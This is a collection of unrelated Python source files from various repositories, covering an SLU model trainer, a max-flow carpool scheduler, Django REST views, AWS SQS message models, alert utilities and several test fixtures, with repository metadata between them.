                paths.append(None)
        mask_paths.append(paths)
    return image_paths, mask_paths
| 2.359375 | 2 |
src/slu/trainer.py | colincen/coach | 0 | 12767372 |
from src.slu.datareader import domain_set, y1_set, y2_set
from preprocess.gen_embeddings_for_slu import domain2slot
import torch
import torch.nn as nn
import os
from tqdm import tqdm
import numpy as np
import logging
logger = logging.getLogger()
from src.conll2002_metrics import *
class SLUTrainer(object):
    """Training/evaluation driver for the SLU model: a binary BIO tagger
    plus a slot-name predictor, optionally regularized with a template
    sentence-representation generator (label encoder)."""

    def __init__(self, params, binary_slu_tagger, slotname_predictor, sent_repre_generator=None):
        self.params = params
        self.binary_slu_tagger = binary_slu_tagger
        self.slotname_predictor = slotname_predictor
        self.lr = params.lr
        # params.tr toggles the template/label-encoder regularization path.
        self.use_label_encoder = params.tr
        self.num_domain = params.num_domain

        if self.use_label_encoder:
            self.sent_repre_generator = sent_repre_generator
            self.loss_fn_mse = nn.MSELoss()
            model_parameters = [
                {"params": self.binary_slu_tagger.parameters()},
                {"params": self.slotname_predictor.parameters()},
                {"params": self.sent_repre_generator.parameters()}
            ]
        else:
            model_parameters = [
                {"params": self.binary_slu_tagger.parameters()},
                {"params": self.slotname_predictor.parameters()}
            ]
        # Adam optimizer
        self.optimizer = torch.optim.Adam(model_parameters, lr=self.lr)
        self.loss_fn = nn.CrossEntropyLoss()

        # Early-stopping bookkeeping, driven by dev-set final F1.
        self.early_stop = params.early_stop
        self.no_improvement_num = 0
        self.best_f1 = 0

        self.stop_training_flag = False

    def train_step(self, X, lengths, y_bin, y_final, y_dm, templates=None, tem_lengths=None, epoch=None):
        """Run one optimization step on a batch and return scalar losses.

        Returns (loss_bin, loss_slotname) or, with the label encoder on,
        (loss_bin, loss_slotname, template0_loss, template1_loss).
        """
        self.binary_slu_tagger.train()
        self.slotname_predictor.train()
        if self.use_label_encoder:
            self.sent_repre_generator.train()

        bin_preds, lstm_hiddens = self.binary_slu_tagger(X, lengths)

        ## optimize binary_slu_tagger
        loss_bin = self.binary_slu_tagger.crf_loss(bin_preds, lengths, y_bin)
        self.optimizer.zero_grad()
        loss_bin.backward(retain_graph=True)

        ## optimize slotname_predictor
        pred_slotname_list, gold_slotname_list = self.slotname_predictor(y_dm, lstm_hiddens, binary_golds=y_bin, final_golds=y_final)

        with torch.autograd.set_detect_anomaly(True):
            for pred_slotname_each_sample, gold_slotname_each_sample in zip(pred_slotname_list, gold_slotname_list):
                assert pred_slotname_each_sample.size()[0] == gold_slotname_each_sample.size()[0]
                # NOTE(review): each sample's loss is back-propagated
                # individually; only the *last* sample's loss value is
                # kept and returned below.
                loss_slotname = self.loss_fn(pred_slotname_each_sample, gold_slotname_each_sample.cuda())
                loss_slotname.backward(retain_graph=True)

        if self.use_label_encoder:
            templates_repre, input_repre = self.sent_repre_generator(templates, tem_lengths, lstm_hiddens, lengths)

            # Pull template 0 (positive) towards the frozen input
            # representation and push templates 1 and 2 (negatives) away.
            input_repre = input_repre.detach()
            template0_loss = self.loss_fn_mse(templates_repre[:, 0, :], input_repre)
            template1_loss = -1 * self.loss_fn_mse(templates_repre[:, 1, :], input_repre)
            template2_loss = -1 * self.loss_fn_mse(templates_repre[:, 2, :], input_repre)
            input_repre.requires_grad = True

            template0_loss.backward(retain_graph=True)
            template1_loss.backward(retain_graph=True)
            template2_loss.backward(retain_graph=True)

            if epoch > 3:
                # After a warm-up, also move the input representation
                # relative to the (now frozen) template representations.
                templates_repre = templates_repre.detach()
                input_loss0 = self.loss_fn_mse(input_repre, templates_repre[:, 0, :])
                input_loss1 = -1 * self.loss_fn_mse(input_repre, templates_repre[:, 1, :])
                input_loss2 = -1 * self.loss_fn_mse(input_repre, templates_repre[:, 2, :])
                templates_repre.requires_grad = True

                input_loss0.backward(retain_graph=True)
                input_loss1.backward(retain_graph=True)
                input_loss2.backward(retain_graph=True)

            self.optimizer.step()

        if self.use_label_encoder:
            return loss_bin.item(), loss_slotname.item(), template0_loss.item(), template1_loss.item()
        else:
            self.optimizer.step()
            return loss_bin.item(), loss_slotname.item()

    def evaluate(self, dataloader, istestset=False):
        """Decode the whole dataloader and return (bin_f1, final_f1, stop_flag).

        On the dev set (istestset=False) this also drives model selection
        and early stopping based on the final (slot-filling) F1.
        """
        self.binary_slu_tagger.eval()
        self.slotname_predictor.eval()

        binary_preds, binary_golds = [], []
        final_preds, final_golds = [], []

        pbar = tqdm(enumerate(dataloader), total=len(dataloader))
        for i, (X, lengths, y_bin, y_final, y_dm) in pbar:
            binary_golds.extend(y_bin)
            final_golds.extend(y_final)

            X, lengths = X.cuda(), lengths.cuda()
            bin_preds_batch, lstm_hiddens = self.binary_slu_tagger(X, lengths)
            bin_preds_batch = self.binary_slu_tagger.crf_decode(bin_preds_batch, lengths)
            binary_preds.extend(bin_preds_batch)

            slotname_preds_batch = self.slotname_predictor(y_dm, lstm_hiddens, binary_preditions=bin_preds_batch, binary_golds=None, final_golds=None)
            final_preds_batch = self.combine_binary_and_slotname_preds(y_dm, bin_preds_batch, slotname_preds_batch)
            final_preds.extend(final_preds_batch)

        # binary predictions
        binary_preds = np.concatenate(binary_preds, axis=0)
        binary_preds = list(binary_preds)
        binary_golds = np.concatenate(binary_golds, axis=0)
        binary_golds = list(binary_golds)

        # final predictions
        final_preds = np.concatenate(final_preds, axis=0)
        final_preds = list(final_preds)
        final_golds = np.concatenate(final_golds, axis=0)
        final_golds = list(final_golds)

        # Format as CoNLL-2002 lines ("token pred gold") for scoring.
        bin_lines, final_lines = [], []
        for bin_pred, bin_gold, final_pred, final_gold in zip(binary_preds, binary_golds, final_preds, final_golds):
            bin_slot_pred = y1_set[bin_pred]
            bin_slot_gold = y1_set[bin_gold]

            final_slot_pred = y2_set[final_pred]
            final_slot_gold = y2_set[final_gold]

            bin_lines.append("w" + " " + bin_slot_pred + " " + bin_slot_gold)
            final_lines.append("w" + " " + final_slot_pred + " " + final_slot_gold)

        bin_result = conll2002_measure(bin_lines)
        bin_f1 = bin_result["fb1"]

        final_result = conll2002_measure(final_lines)
        final_f1 = final_result["fb1"]

        if istestset == False:  # dev set
            if final_f1 > self.best_f1:
                self.best_f1 = final_f1
                self.no_improvement_num = 0
                logger.info("Found better model!!")
                self.save_model()
            else:
                self.no_improvement_num += 1
                logger.info("No better model found (%d/%d)" % (self.no_improvement_num, self.early_stop))

            if self.no_improvement_num >= self.early_stop:
                self.stop_training_flag = True

        return bin_f1, final_f1, self.stop_training_flag

    def combine_binary_and_slotname_preds(self, dm_id_batch, binary_preds_batch, slotname_preds_batch):
        """Merge BIO predictions with per-chunk slot-name predictions.

        Input:
            dm_id_batch: (bsz)
            binary_preds: (bsz, seq_len)
            slotname_preds: (bsz, num_slotname, slot_num)
        Output:
            final_preds: (bsz, seq_len) — indices into y2_set
        """
        final_preds = []
        for i in range(len(dm_id_batch)):
            dm_id = dm_id_batch[i]
            binary_preds = binary_preds_batch[i]
            slotname_preds = slotname_preds_batch[i]
            slot_list_based_dm = domain2slot[domain_set[dm_id]]

            # NOTE(review): the outer loop variable `i` is reused here as
            # the per-sentence chunk counter.
            i = -1
            final_preds_each = []
            for bin_pred in binary_preds:
                # values of bin_pred are 0 (O), or 1(B) or 2(I)
                if bin_pred.item() == 0:
                    final_preds_each.append(0)
                elif bin_pred.item() == 1:
                    i += 1
                    pred_slot_id = torch.argmax(slotname_preds[i])
                    slotname = "B-" + slot_list_based_dm[pred_slot_id]
                    final_preds_each.append(y2_set.index(slotname))
                elif bin_pred.item() == 2:
                    if i == -1:
                        # "I" with no preceding "B": fall back to O.
                        final_preds_each.append(0)
                    else:
                        pred_slot_id = torch.argmax(slotname_preds[i])
                        slotname = "I-" + slot_list_based_dm[pred_slot_id]
                        if slotname not in y2_set:
                            final_preds_each.append(0)
                        else:
                            final_preds_each.append(y2_set.index(slotname))

            assert len(final_preds_each) == len(binary_preds)
            final_preds.append(final_preds_each)

        return final_preds

    def save_model(self):
        """
        save the best model (both sub-modules) to the dump path
        """
        saved_path = os.path.join(self.params.dump_path, "best_model.pth")
        torch.save({
            "binary_slu_tagger": self.binary_slu_tagger,
            "slotname_predictor": self.slotname_predictor
        }, saved_path)
        logger.info("Best model has been saved to %s" % saved_path)
| 2.359375 | 2 |
shfl/private/reproducibility.py | joarreg/Sherpa.ai-Federated-Learning-Framework | 2 | 12767373 | import random
import numpy as np
import tensorflow as tf
class Reproducibility:
    """
    Singleton class for ensure reproducibility.
    You indicates the seed and the execution is the same. The server initialice this class and the clients only
    call/get a seed.

    Server initialize it with Reproducibility(seed) before all executions
    For get a seed, the client has to put Reproducibility.get_instance().set_seed(ID)

    Is important to know that the reproducibility only works if you execute the experiment in CPU. Many ops in GPU
    like convolutions are not deterministic and the don't replicate.

    # Arguments:
        seed: the main seed for server

    # Properties:
        seed:
            return server seed
        seeds:
            return all seeds
    """
    __instance = None

    @staticmethod
    def get_instance():
        """
        Static access method.

        # Returns:
            instance: Singleton instance class
        """
        # Lazily create the (seedless) singleton on first access.
        if Reproducibility.__instance is None:
            Reproducibility()
        return Reproducibility.__instance

    def __init__(self, seed=None):
        """
        Virtually private constructor.
        """
        if Reproducibility.__instance is not None:
            raise Exception("This class is a singleton")
        else:
            self.__seed = seed
            # Map of node id -> seed; the server's own seed is stored
            # under the 'server' key.
            self.__seeds = {'server': self.__seed}
            Reproducibility.__instance = self
            if self.__seed is not None:
                self.set_seed('server')

    def set_seed(self, id):
        """
        Set server and clients seed

        # Arguments:
            id: 'server' in server node and ID in client node

        NOTE: the parameter name shadows the builtin ``id``; kept for
        API compatibility.
        """
        # First call for a node derives a fresh random seed from the
        # server's numpy RNG; later calls reuse the stored seed.
        if id not in self.__seeds.keys():
            self.__seeds[id] = np.random.randint(2**32-1)
        np.random.seed(self.__seeds[id])
        random.seed(self.__seeds[id])
        tf.random.set_seed(self.__seeds[id])

    @property
    def seed(self):
        return self.__seed

    @property
    def seeds(self):
        return self.__seeds

    def delete_instance(self):
        """
        Remove the singleton instance. Not recommended for normal use. This method is necessary for tests.
        """
        if Reproducibility.__instance is not None:
            del self.__seed
            del self.__seeds
            Reproducibility.__instance = None
| 3.34375 | 3 |
cephlm/tests/cephmetrics/system/test_hpssacli.py | ArdanaCLM/cephlm | 0 | 12767374 | #!/usr/bin/env python
#
# (c) Copyright 2016 Hewlett Packard Enterprise Development LP
# (c) Copyright 2017 SUSE LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import unittest
from cephlm.tests.cephmetrics.system.test_data import HPssaCliData
from cephlm.cephmetrics.system.hpssacli import HPssaCli
from cephlm.common.exceptions import CephLMException
class TestHPssaCli(unittest.TestCase):
    """Unit tests for cephlm's HPssaCli wrapper around swiftlm hpssacli."""

    @mock.patch('swiftlm.hp_hardware.hpssacli.main')
    def test_check_hpssacli_success(self, mock_hpssacli):
        """Metrics from swiftlm are relabelled as cephlm.hpssacli metrics."""
        mock_hpssacli.return_value = HPssaCliData.MOCK_RESPONSE
        result = HPssaCli.check_hpssacli()
        for entry in result:
            self.assertEqual(entry.dimensions['service'], 'ceph-storage')
            self.assertTrue(entry.name.startswith('cephlm.hpssacli'))

    @mock.patch('swiftlm.hp_hardware.hpssacli.main')
    def test_check_hpssacli_failure(self, mock_hpssacli):
        """Any exception from swiftlm is wrapped in a CephLMException."""
        mock_hpssacli.side_effect = Exception("Unknown error")
        regexp = "Unknown exception occured when " \
                 "executing swiftlm hpssacli module"
        self.assertRaisesRegexp(CephLMException, regexp,
                                lambda: HPssaCli.check_hpssacli())
| 2.09375 | 2 |
chaos_genius/alerts/utils.py | rsohlot/chaos_genius | 320 | 12767375 | """Common utilities for alerts and alert digests."""
import os
from math import floor, log10
from typing import List, Optional, Union
from jinja2 import Environment, FileSystemLoader, select_autoescape
from chaos_genius.alerts.email import send_static_alert_email
from chaos_genius.core.utils.round import round_number
from chaos_genius.settings import CHAOSGENIUS_WEBAPP_URL
class AlertException(Exception):
    """A general exception in a specific alert.

    Stores and prints alert ID and KPI ID.
    """

    def __init__(self, message: str, alert_id: int, kpi_id: Optional[int] = None):
        """Initialize a new alert exception.

        Args:
            message: exception message.
            alert_id: ID of alert where this originated from.
            kpi_id: ID of KPI associated with the alert.
        """
        prefix = (
            f"(KPI: {kpi_id}, Alert: {alert_id})"
            if kpi_id
            else f"(Alert: {alert_id})"
        )
        super().__init__(f"{prefix} {message}")
def webapp_url_prefix():
    """Constructs webapp URL prefix with a trailing slash.

    If not setup, this will be an invalid URL with an appropriate message.

    TODO: redirect to docs link showing how to setup instead of invalid URL.
    """
    if not CHAOSGENIUS_WEBAPP_URL:
        return "Webapp URL not setup. Please setup CHAOSGENIUS_WEBAPP_URL in the environment file./"

    if CHAOSGENIUS_WEBAPP_URL.endswith("/"):
        return CHAOSGENIUS_WEBAPP_URL
    return f"{CHAOSGENIUS_WEBAPP_URL}/"
def change_message_from_percent(percent_change: Union[str, int, float]) -> str:
    """Creates a change message from given percentage change.

    percent_change will be:
        - "–" in case the last data point was missing or both the points had values 0
        - 0 (int) in case there was no change
        - positive value (int/float) in case there was an increase
        - negative value (int/float) in case there was a decrease
    """
    if isinstance(percent_change, str):
        return percent_change
    if percent_change == 0:
        return "No change (–)"
    direction = "Increased" if percent_change > 0 else "Decreased"
    return f"{direction} by ({percent_change}%)"
def find_percentage_change(
    curr_val: Union[int, float], prev_val: Optional[Union[int, float]]
) -> Union[int, float, str]:
    """Calculates percentage change between previous and current value.

    Returns "–" when the previous point is missing or both values are 0,
    "+inf"/"-inf" when only the previous value is 0, and a rounded number
    otherwise.
    """
    if prev_val is None:
        # previous point wasn't found
        return "–"
    if prev_val == 0:
        if curr_val == 0:
            # both current and previous value are 0
            return "–"
        # previous value is 0, but current value isn't
        return ("+" if curr_val > 0 else "-") + "inf"
    return round_number((curr_val - prev_val) / prev_val * 100)
def send_email_using_template(
    template_name: str,
    recipient_emails: List[str],
    subject: str,
    files: List[dict],
    **kwargs,
) -> None:
    """Render the named Jinja2 template and send it as a static alert email.

    Templates are loaded from the ``email_templates`` directory next to this
    module; ``kwargs`` are passed straight to ``template.render``; ``files``
    are forwarded as attachments.
    """
    path = os.path.join(os.path.dirname(__file__), "email_templates")
    env = Environment(
        loader=FileSystemLoader(path), autoescape=select_autoescape(["html", "xml"])
    )

    template = env.get_template(template_name)

    send_static_alert_email(recipient_emails, subject, template.render(**kwargs), files)
# Human-readable-number suffixes keyed by power of ten (nano to trillion),
# used by human_readable() below.
HRN_PREFIXES = {
    -9: "n",
    -6: "µ",
    -3: "m",
    0: "",
    3: "K",
    6: "M",
    9: "B",
    12: "T",
}
def _get_exponent(num: float) -> int:
"""Returns the power of 10 to which the number is raised to."""
if num == 0:
return 0
return floor(log10(abs(num)))
def human_readable(num: float) -> str:
    """Returns the human readable format of a number.

    The magnitude is snapped to the nearest lower multiple of 3 and the
    matching suffix from HRN_PREFIXES is appended (e.g. 1500 -> "1.5K").
    """
    exponent = _get_exponent(num)
    # Clamp to the range of known prefixes (-9 .. 12).  Previously a value
    # smaller than 1e-9 (exponent < -9) produced a key like -12 and raised
    # KeyError; such values now use the "n" (nano) prefix.
    new_exponent = min(max(3 * floor(exponent / 3), -9), 12)
    precision = 10 ** (new_exponent)
    new_val = round(num / precision, 3)
    human_readable_format = str(new_val) + HRN_PREFIXES[new_exponent]
    return human_readable_format
| 2.421875 | 2 |
youtube_transcript_api/__init__.py | crhowell/youtube-transcript-api | 0 | 12767376 | <filename>youtube_transcript_api/__init__.py
from ._api import YouTubeTranscriptApi
from ._transcripts import TranscriptList, Transcript
from ._errors import (
TranscriptsDisabled,
NoTranscriptFound,
CouldNotRetrieveTranscript,
VideoUnavailable,
TooManyRequests,
NotTranslatable,
TranslationLanguageNotAvailable,
NoTranscriptAvailable,
CookiePathInvalid,
CookiesInvalid,
FailedToCreateConsentCookie,
)
| 1.351563 | 1 |
utils.py | ERUIHNIYHBKBNF/Digit-Recognition | 0 | 12767377 | <filename>utils.py
import cv2
import numpy as np
import os
def saveimg(img, name):
    """Write *img* to ./train_data/<name> (the directory must already exist)."""
    dirpath = "./train_data"
    filepath = os.path.join(dirpath, name)
    cv2.imwrite(filepath, img)
def showimg(img):
    """Display *img* in a resizable window and block until a key is pressed."""
    cv2.namedWindow("Image", 0)
    cv2.imshow("Image", img)
    cv2.waitKey(0)
def showImgWithCons(img, cons):
    """Draw all contours *cons* onto *img* (in place, BGR red), then show it."""
    cv2.drawContours(img, cons, -1, (0, 0, 255), 1)
    showimg(img)
def showImgWithRect(img, boundings):
    """Draw each (x, y, w, h) bounding box onto *img* (in place, BGR red),
    then show it."""
    for rect in boundings:
        [x, y, w, h] = rect
        cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)
    showimg(img)
# OpenCV's kNN model expects train_data to be a 2-D array in which every
# element is an image flattened to one dimension, with pixel values stored
# as float32.  Build a flat array of length height * width of the image.
# Since the image has been binarised greyscale, the three RGB channel
# values are identical, so taking any single channel is enough.
def rgbToFloat32(img):
    """Flatten channel 0 of *img* into a 1-D float32 array.

    The image is a binarised greyscale image whose RGB channels are equal,
    so only the first channel is kept.  The result is the flat ``float32``
    vector layout that OpenCV's kNN ``train_data`` expects (row-major,
    length height * width).
    """
    # Vectorised equivalent of the original nested Python loops.
    return np.asarray(img)[:, :, 0].ravel().astype('float32')
src/graph_build/tests/otp_graph_import/conftest.py | hellej/hope-green-path-server | 5 | 12767378 | <filename>src/graph_build/tests/otp_graph_import/conftest.py
import os
import pytest
from graph_build.otp_graph_import.conf import OtpGraphImportConf
# Import configuration pointing at the small test fixtures; all GeoPackage
# debug exports are disabled for tests.
conf = OtpGraphImportConf(
    node_csv_file = 'graph_build/tests/otp_graph_import/data/test_nodes.csv',
    edge_csv_file = 'graph_build/tests/otp_graph_import/data/test_edges.csv',
    hma_poly_file = 'graph_build/tests/common/HMA.geojson',
    igraph_out_file = 'graph_build/tests/otp_graph_import/temp/test_graph.graphml',
    b_export_otp_data_to_gpkg = False,
    b_export_decomposed_igraphs_to_gpkg = False,
    b_export_final_graph_to_gpkg = False,
    debug_otp_graph_gpkg = None,
    debug_igraph_gpkg = None
)

# Full OTP exports and the Kumpula-area subsets used by individual tests.
all_nodes_fp = 'graph_build/otp_graph_import/otp_nodes.csv'
all_edges_fp = 'graph_build/otp_graph_import/otp_edges.csv'
kumpula_nodes_fp = 'graph_build/tests/otp_graph_import/data/kumpula_nodes.csv'
kumpula_edges_fp = 'graph_build/tests/otp_graph_import/data/kumpula_edges.csv'
kumpula_aoi_fp = 'graph_build/tests/otp_graph_import/data/kumpula_aoi.geojson'
# Directory where tests write their temporary graph outputs.
graph_import_graph_out_dir = r'graph_build/tests/otp_graph_import/temp/'
@pytest.fixture(scope='session', autouse=True)
def remove_test_exports():
    """Session-scoped autouse fixture: clear previous test exports from the
    temp output directory (keeping .gitignore) before the session runs."""
    files_to_rm = os.listdir(graph_import_graph_out_dir)
    for fn in files_to_rm:
        if fn == '.gitignore':
            continue
        os.remove(fr'{graph_import_graph_out_dir}{fn}')
        print(f'Removed test data: {graph_import_graph_out_dir}{fn}')
| 1.765625 | 2 |
sso_trial/routing.py | ujjawal01/temporary-repo | 0 | 12767379 | <reponame>ujjawal01/temporary-repo
from channels.routing import ProtocolTypeRouter, URLRouter
from django.conf.urls import url
from channels.http import AsgiHandler
from channels.auth import AuthMiddlewareStack
import news.routing
# Channels ASGI routing: websocket connections pass through Django's auth
# middleware and are dispatched to the `news` app's websocket URL patterns.
# (HTTP requests fall back to the default Django ASGI handling.)
application = ProtocolTypeRouter({
    "websocket": AuthMiddlewareStack(
        URLRouter(
            news.routing.websocket_urlpatterns
        )
    ),
})
setup.py | Tinggaard/pathfinding | 0 | 12767380 | <gh_stars>0
from setuptools import setup
# setuptools packaging metadata for the `pathfinding` project; the console
# entry point `pathfinding` maps to the click CLI in pathfinding/main.py.
setup(
    name='pathfinding',
    version='0.1.0',

    # metadata
    author='<NAME>',
    author_email='<EMAIL>',
    description='Using pathfinding algorithms to solve mazes.',
    keywords='pathfinding maze labyrith astar dijkstra breadthfirst depthfirst solving daedalus',
    url='https://github.com/Tinggaard/pathfinding',
    license=open('LICENSE').read(),
    long_description=open('README.md', encoding='utf-8').read(),
    long_description_content_type='text/markdown',
    python_requires='>=3.6', #tested with
    zip_safe=False,

    py_modules=[
        'pathfinding/main',
    ],

    install_requires=[
        'numpy', # basic structure of Graph
        'pillow', # image loader and writer
        'pydaedalus', # maze generator
        'matplotlib', # video handler and plotter
        'celluloid', # video renderer wrapper
        'click', # arg handler
        'colorama' # windows colors in terminal
    ],

    entry_points={
        'console_scripts': ['pathfinding=pathfinding.main:cli']
    },
)
| 1.296875 | 1 |
carpool.py | JackMao981/Carpool | 0 | 12767381 | import numpy as np
import math
from generate_schedule import *
def adjacent(g, node, n):
    """
    find all adjacent nodes of input node in g

    g: 2D array of numbers, the adjacency matrix (nonzero = edge with
       remaining capacity)
    node: int, the node whose neighbors you want to find
    n: int, number of nodes in the graph
    return: a list of ints (neighbor indices, in ascending order)
    """
    # Comprehension form of the original append loop.
    return [i for i in range(n) if g[node][i] != 0]
def bfs(s, t, parent, g, n):
    """
    breadth first search algorithm

    s: int, source
    t: int, sink
    parent: list, parent of each node indexed by node id (filled in place)
    g: 2D array of numbers, the adjacency matrix
    n: int, number of nodes
    return: (bool, list) — whether a path from s to t exists, and the
            parent list describing the discovered tree/path
    """
    seen = [False] * n
    seen[s] = True
    frontier = [s]
    while frontier:
        current = frontier.pop(0)
        for neighbour in adjacent(g, current, n):
            if seen[neighbour]:
                continue
            parent[neighbour] = current
            seen[neighbour] = True
            # Stop as soon as the sink is reached.
            if neighbour == t:
                return True, parent
            frontier.append(neighbour)
    return False, parent
def edmond_karp(g, n):
    """
    Main function for edmond karp algorithm

    g: 2D array of numbers, the adjacency matrix of capacities;
       modified in place into the residual graph
    n: int, number of nodes (source is node 0, sink is node len(g)-1)
    return: int, max flow
    """
    source = 0
    sink = len(g) - 1
    parent = [-1] * n
    max_flow = 0
    while True:
        # Run BFS once per augmenting step (the original called it twice,
        # doing the whole search redundantly each iteration).
        found, parent = bfs(source, sink, parent, g, n)
        if not found:
            return max_flow
        # Bottleneck capacity along the discovered path.
        path_flow = math.inf
        s = sink
        while (s != source):
            path_flow = min(path_flow, g[parent[s]][s])
            s = parent[s]
        max_flow += path_flow
        # Update residual capacities (forward minus, reverse plus).
        v = sink
        while (v != source):
            u = parent[v]
            g[u][v] -= path_flow
            g[v][u] += path_flow
            v = parent[v]
def print_g(g):
    """
    prints the graph, a helper function for clarity

    Each entry is rounded to 2 decimals and tab-separated; one row per line.
    """
    for i in g:
        for j in i:
            print(round(j,2), "\t", end = '')
        print("\n")
def print_schedule(g, p, n):
    """
    prints the schedule; row: people, columns: days

    g: adjacency matrix after running max-flow; g[day][person] is read,
       which presumably holds the assigned amount via the residual
       reverse edges — confirm against edmond_karp's updates
    p: number of people (nodes 1..p)
    n: total number of nodes (source 0, days p+1..n-2, sink n-1)
    """
    print( "\t\t", end = '')
    # Header row: one column per day node.
    for i in range(1, n-1-p):
        print("day", i, "\t", end = '')
    print()
    for j in range(1, p+1):
        print("person", j, "\t", end = '')
        for i in range(p+1, n-1):
            print(round(g[i][j],2), "\t", end = '')
        print("\n")
| 3.9375 | 4 |
Python-Fundamentals/Dictionaries/statistics.py | Xamaneone/SoftUni-Intro | 0 | 12767382 | data = input()
products = {}
while not data == "statistics":
product, quantity = data.split(": ")
quantity = int(quantity)
if product in products:
products[product] += quantity
else:
products[product] = quantity
data = input()
print("Products in stock:")
for product in products:
print(f"- {product}: {products[product]}")
print(f"Total Products: {len(products)}")
print(f"Total Quantity: {sum(products.values())}")
| 3.96875 | 4 |
tracardi_aws_sqs/model/model.py | Tracardi/tracardi-aws-sqs-connector | 0 | 12767383 | from typing import Any
from pydantic import validator, create_model, AnyHttpUrl
from pydantic.main import BaseModel
from tracardi.domain.entity import Entity
class AwsIamAuth(BaseModel):
    """AWS IAM credentials used to authenticate the SQS client."""
    aws_access_key_id: str
    aws_secret_access_key: str
class Content(BaseModel):
    """Message payload: the body text and its content type."""
    content: str
    type: str

    @validator('content')
    def must_have_2_letters(cls, v):
        """Reject payloads shorter than two characters."""
        if len(v) < 2:
            raise ValueError('String is too short. String must be at least two letters long.')
        return v
class AwsSqsConfiguration(BaseModel):
    """Plugin configuration: credential source, message, queue and delay."""
    source: Entity
    message: Content
    region_name: str
    queue_url: AnyHttpUrl
    delay_seconds: int = 0  # SQS DelaySeconds; 0 = deliver immediately
    message_attributes: str
class MessageAttribute:
    """A single SQS message attribute.

    Numeric values (int/float, but not bool) map to the SQS "Number" data
    type; everything else — bools included — is serialised as a "String".
    The stored value is always the ``str()`` of the input.
    """

    def __init__(self, value):
        self.value = value
        # bool is a subclass of int, so exclude it explicitly to keep
        # True/False serialised as strings.
        if isinstance(value, (int, float)) and not isinstance(value, bool):
            self.type = "Number"
        else:
            self.type = "String"
        self.key = "StringValue"
        self.value = str(value)

    def dict(self):
        """Return the attribute in the boto3 SQS MessageAttributes shape."""
        return {
            "DataType": self.type,
            self.key: self.value
        }
class MessageAttributes:
    """A collection of SQS message attributes built from a flat dict.

    Only scalar values are accepted; nested dicts/lists are rejected.
    """

    def __init__(self, values: dict):
        self._value = {}
        for name, raw in values.items():
            if isinstance(raw, (dict, list)):
                raise ValueError("Attributes must be key value pairs. Allowed values are strings and "
                                 "numbers")
            self._value[name] = MessageAttribute(raw)

    def dict(self):
        """Return all attributes in the boto3 MessageAttributes format."""
        return {name: attr.dict() for name, attr in self._value.items()}
| 2.703125 | 3 |
inventory/api/api_views.py | jeff-eng/Commune | 1 | 12767384 | from rest_framework import permissions
from rest_framework.generics import ListAPIView, CreateAPIView, RetrieveUpdateDestroyAPIView
from rest_framework.exceptions import ValidationError
from inventory.api.serializers import AssetSerializer, BorrowerSerializer, CategorySerializer
from inventory.models import Asset, Borrower, Category
from inventory.permissions import IsOwnerOrReadOnly
class AssetRetrieveUpdateDestroy(RetrieveUpdateDestroyAPIView):
    """Retrieve/update/delete a single Asset looked up by ``uid``;
    writes require authentication and ownership."""
    lookup_field = 'uid'
    serializer_class = AssetSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]

    def get_queryset(self):
        # All assets are visible; IsOwnerOrReadOnly guards modifications.
        # return Asset.objects.filter(owner=self.request.user)
        return Asset.objects.all()
class BorrowerRetrieveUpdateDestroy(RetrieveUpdateDestroyAPIView):
    """Retrieve/update/delete a single Borrower looked up by ``id``."""
    lookup_field = 'id'
    serializer_class = BorrowerSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]

    def get_queryset(self):
        return Borrower.objects.all()
class AssetList(ListAPIView):
    """List the assets owned by the requesting user."""
    serializer_class = AssetSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]

    def get_queryset(self):
        """
        This view returns a list of all the assets owned by the currently authenticated user.
        """
        return Asset.objects.filter(owner=self.request.user)
class CategoryList(ListAPIView):
    """List all categories; categories are global, not scoped to a user."""
    serializer_class = CategorySerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Category.objects.all()
class BorrowerList(ListAPIView):
    """List the borrowers associated with the requesting user."""
    serializer_class = BorrowerSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    def get_queryset(self):
        return Borrower.objects.filter(associated_user=self.request.user)
class AssetCreate(CreateAPIView):
    """Create a new Asset owned by the requesting user."""
    serializer_class = AssetSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    def perform_create(self, serializer):
        # Stamp the authenticated user as the owner of the new asset.
        serializer.save(owner=self.request.user)
    def create(self, request, *args, **kwargs):
        try:
            name = request.data.get('name')
            # Reject an explicitly supplied empty name before serializer
            # validation runs.
            if name is not None and len(name) < 1:
                raise ValidationError({'name': 'Must be at least one character in length.'})
        except ValueError:
            # NOTE(review): nothing in the try block obviously raises
            # ValueError (DRF parse errors surface before .get()) — confirm
            # this branch is actually reachable.
            raise ValidationError({'name': 'Valid characters only.'})
        return super().create(request, *args, **kwargs)
    def get_queryset(self):
        return Asset.objects.filter(owner=self.request.user)
class BorrowerCreate(CreateAPIView):
    """Create a new Borrower; the queryset is scoped to the requesting user."""
    serializer_class = BorrowerSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    def get_queryset(self):
        return Borrower.objects.filter(associated_user=self.request.user)
class CategoryCreate(CreateAPIView):
    """Create a new Category (global, not tied to a user)."""
    serializer_class = CategorySerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Category.objects.all()
envios/api/models.py | serivt/aes-amazoom | 0 | 12767385 | <filename>envios/api/models.py
from django.db import models
class Shipping(models.Model):
    """A shipment: a quantity of one product sent to an address."""
    product = models.CharField(max_length=2023)
    address = models.CharField(max_length=2023)
    amount = models.IntegerField()
    total_price = models.FloatField()
    def __str__(self):
        return self.product
    @property
    def precio(self):
        # Unit price derived from the stored total.
        # NOTE(review): raises ZeroDivisionError when amount == 0 — confirm
        # amount is always positive.
        return self.total_price / self.amount
    @precio.setter
    def precio(self, precio):
        # Setting the unit price recomputes the stored total.
        self.total_price = precio * self.amount
| 2.84375 | 3 |
gammapy/time/tests/test_exptest.py | contrera/gammapy | 0 | 12767386 | <gh_stars>0
# Licensed under a 3-clause BSD style license - see LICENSE.rst
